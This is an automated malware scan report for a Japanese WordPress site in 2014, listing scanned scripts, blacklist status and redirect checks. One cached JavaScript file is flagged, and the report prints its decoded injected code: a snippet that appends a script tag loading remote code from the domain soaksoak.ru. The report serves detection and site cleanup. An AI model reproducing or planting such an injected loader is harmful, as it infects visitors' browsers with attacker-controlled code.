Malware Scanner report for win5-yosou.com

Malicious/Suspicious/Total URLs checked
2/0/15
2 pages have malicious code. See details below.
Blacklists
Found
The website is marked by Google as suspicious.

The website "win5-yosou.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=win5-yosou.com

Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.

Scanned pages/files

Request / Server response / Status
http://win5-yosou.com/
200 OK
Content-Length: 28339
Content-Type: text/html
clean
http://win5-yosou.com/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/cache/head-cleaner/js/36183e9c48c3ba5e187f4b986b43a1be.js
200 OK
Content-Length: 2284
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/cache/head-cleaner/js/cc05da8259f9757b9e0c4166ffe84b58.js
200 OK
Content-Length: 7028
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/cache/head-cleaner/js/908c4e6af2a56b1a8873bfd22a45195d.js
200 OK
Content-Length: 10845
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: soaksoak.ru

var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLow
...[3669 bytes skipped]...

Decoded script:


function f() {
if (J) {
return;
}
try {
var Z = j.getElementsByTagName("body")[0].appendChild(C("span"));
Z.parentNode.removeChild(Z);
} catch (aa) {
return;
}
J = true;
var X = U.length;
for (var Y = 0; Y < X; Y++) {
U[Y]();
}
}
(function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }());
(function() { var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }());

http://win5-yosou.com/wp-content/cache/head-cleaner/js/eb7c97209ed8acb2feea7160fe4e2664.js
200 OK
Content-Length: 144
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/themes/dynamic/js/jscript.js
200 OK
Content-Length: 1933
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/themes/dynamic/js/scroll.js
200 OK
Content-Length: 580
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/themes/dynamic/js/comment.js
200 OK
Content-Length: 2278
Content-Type: application/x-javascript
clean
http://rranking15.ziyu.net/rank.php?win5yosou
200 OK
Content-Length: 391
Content-Type: application/x-javascript
clean
http://rranking15.ziyu.net/js/win5yosou.js
200 OK
Content-Length: 7044
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: win5-yosou.com

...[1511 bytes skipped]...
k+'>97</TD></TR><TR><TD bgcolor="#FFFFFF"'+acrrrank+'>3</TD><TD align=left bgcolor="#FFFFFF"><A href="http://www.bing.com/" target=_blank>bingŒŸõ</A></TD><TD bgcolor="#FFFFFF" nowrap '+acrrrank+'>60</TD></TR><TR><TD bgcolor="#fafafa"'+acrrrank+'>4</TD><TD align=left bgcolor="#fafafa"><A href="http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com" target=_blank>http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com</A></TD><TD bgcolor="#fafafa" nowrap '+acrrrank+'>41</TD></TR><TR><TD bgcolor="#FFFFFF"'+acrrrank+'>5</TD><TD align=left bgcolor="#FFFFFF"><A href="http://racejack.s40.xrea.com/" target=_blank>ƒŒ[ƒXƒWƒƒƒbƒN</A></TD><TD bgcolor="#FFFFFF" nowrap '+acrrrank+'>40</TD></TR><TR><TD bgcolor="#fafafa"'+acrrrank+'&
...[2535 bytes skipped]...

Decoded script:

...[1464 bytes skipped]...
>97</TD></TR><TR><TD bgcolor="#FFFFFF" align=center>3</TD><TD align=left bgcolor="#FFFFFF"><A href="http://www.bing.com/" target=_blank>bingŒŸõ</A></TD><TD bgcolor="#FFFFFF" nowrap align=center>60</TD></TR><TR><TD bgcolor="#fafafa" align=center>4</TD><TD align=left bgcolor="#fafafa"><A href="http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com" target=_blank>http://semalt.semalt.com/crawler.php?u=http://win5-yosou.com</A></TD><TD bgcolor="#fafafa" nowrap align=center>41</TD></TR><TR><TD bgcolor="#FFFFFF" align=center>5</TD><TD align=left bgcolor="#FFFFFF"><A href="http://racejack.s40.xrea.com/" target=_blank>ƒŒ[ƒXƒWƒƒƒbƒN</A></TD><TD bgcolor="#FFFFFF" nowrap align=center>40</TD></TR><TR><TD bgcolor="#fafafa" align=cen
...[6423 bytes skipped]...

http://blogroll.livedoor.net/js/blogroll.js
200 OK
Content-Length: 15522
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.32.0-2013.04.03
200 OK
Content-Length: 15479
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.4.1
200 OK
Content-Length: 7077
Content-Type: application/x-javascript
clean
http://win5-yosou.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.63
200 OK
Content-Length: 3598
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: win5-yosou.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Dec 2014 19:31:25 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://win5-yosou.com/xmlrpc.php

Second query (visit from search engine):
GET / HTTP/1.1
Host: win5-yosou.com
Referer: http://www.google.com/search?q=win5-yosou.com

Result:
The result is similar to the first query. There are no suspicious redirects found.